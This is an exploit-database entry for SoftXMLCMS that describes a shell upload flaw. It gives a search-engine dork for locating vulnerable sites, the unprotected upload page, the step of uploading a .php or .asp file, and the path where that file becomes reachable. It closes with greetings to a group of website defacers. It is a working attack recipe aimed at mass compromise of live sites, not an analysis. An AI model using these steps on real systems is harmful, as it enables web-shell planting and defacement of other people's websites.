SoftXMLCMS - Arbitrary File Upload



EKU-ID: 23181 CVE: OSVDB-71867 OSVDB-ID:
Author: Alexander Published: 2011-04-16 Verified: Not Verified
Download:

Rating

☆☆☆☆☆
Home 


###########################################################################

Exploit Title : softxmlcms  Shell Upload Vulnerability

Google Dork : Powered by softxmlcms

Date : 2011-04-15

Author : *Alexander*

Software Link : http://www.softxml.com

Test On : Windows/asp/php

CVE : Web Applications

###########################################################################

===[ Exploit ]===

http://server/[patch]/XMLEditor2.0/uploadfile1.asp

Select the Choose File And Then Browse File.php  Or File.asp

===[ Upload To ]===

http://server/[patch]/images/File.php

Or

http://server/[patch]/images/File.asp

===[ Demo ]===

http://server/softxmlcms/XMLEditor2.0/uploadfile1.asp

###########################################################################

Greetz : http://Ashiyane.org/Forums

Behrooz_Ice , Q7X , Virangar , Black And All Ashiyane Defacers